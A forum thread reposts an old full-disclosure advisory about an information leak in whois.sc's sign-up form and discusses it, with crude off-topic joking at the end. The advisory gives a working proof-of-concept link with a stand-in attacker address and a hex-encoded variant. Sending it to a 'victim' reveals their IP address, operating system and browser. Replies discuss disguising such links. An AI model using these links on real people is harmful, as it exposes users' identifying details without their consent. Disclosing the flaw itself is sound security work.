Facebook killed the radio star. And by radio star, I mean the premise of distributed forums around the internet. And that got got by Instagram/SnapChat. And that got got by TikTok. Where the fuck is the internet we once knew?
0 Members and 1 Guest are viewing this topic.
Title: whois.sc not-big-deal holeServer-side risk: noneClient-side risk: low risk (private info revealed about the user)Description:This might not even be considered a proper security hole, but Ithought it's an interesting way to get the following information abouta user:- IP Address- Operating system- Web browser versionThis information can be easily obtained by "tricking" someone to visityour website and then checking the webserver logs. Email headers alsohelp, not to mention loud OS detection tools such as xprobe2 and nmap(which will only work if you're lucky and the "victim" doesn't use afirewall blocking all incoming traffic).In this case however, the scenario is a little different because weuse a sign-up service provided by an existing website for our ownpurposes (enumeration).The only limitation of this "trick" is that the attacker needs to usea different email address for each attack. This is because whois.scwill set the account activation status to "pending" after requestingthe account activation with your email address for the first time.The original request to sign-up for an account is a POST request*similar* to the following:POST http://www.whois.sc/members/process.html HTTP/1.1Host: www.whois.scContent-Length: 48action=newaccount&doneurl=&email=test%40test.comHowever we can change the request from POST to GET and the applicationwill happily process the query:http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.comPoC:http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.comReplace "attacker%40evilmail.com" in the previous link with your ownemail address (e.g.: myself%40gmail.com) and send it to the "victim".Also, we could obsfucate our email address by encoding it to hex:http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6DNote: "%40" is "@" in hex. For a good resource to convert strings todifferent encodings check outhttp://www.thedumbterminal.co.uk/php/stringdecode.phpRegards,pagvacEarth, SOLAR SYSTEM_______________________________________________Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
---------------------------------------------------NOTE: You received this message because someone from142.161.170.11(Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051025 Firefox/1.4.1)requested an account for this email address. If youdid not request this account please ignore this messageand you will not be contacted again.---------------------------------------------------
Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.
To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button. With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc.. And on IE for sure, there are several ways to hide where a link is actually sending you to.
Quote from: iago on November 05, 2005, 03:01:45 pmTo spoof POST variables, you'd have to have a website, and convince them to click a "submit" button. With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc.. And on IE for sure, there are several ways to hide where a link is actually sending you to. I kind of misunderstood the exploit, but now I see what it's doing. Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.
True, but you still need to control a site. :-PYes, your way is possible, but much harder to "exploit"
Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.
Quote from: iago on November 05, 2005, 06:10:20 pmThen can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. Where in your first proposition did you say I couldn't use my own website?
Quote from: Sidoh on November 05, 2005, 06:22:38 pmQuote from: iago on November 05, 2005, 06:10:20 pmThen can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. Where in your first proposition did you say I couldn't use my own website? Quote from: iago on November 05, 2005, 04:03:27 pmTrue, but you still need to control a site. :-PYes, your way is possible, but much harder to "exploit"
Quote from: iago on November 05, 2005, 07:04:09 pmQuote from: Sidoh on November 05, 2005, 06:22:38 pmQuote from: iago on November 05, 2005, 06:10:20 pmThen can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site? And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. Where in your first proposition did you say I couldn't use my own website? Quote from: iago on November 05, 2005, 04:03:27 pmTrue, but you still need to control a site. :-PYes, your way is possible, but much harder to "exploit"I do control a site and it's still possible! T_THehe, this is a pretty useless argument, though. I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.
Who gives a damn? I fuck sheep all the time.
And yes, male both ends. There are a couple lesbians that need a two-ended dildo...My router just refuses to wear a strap-on.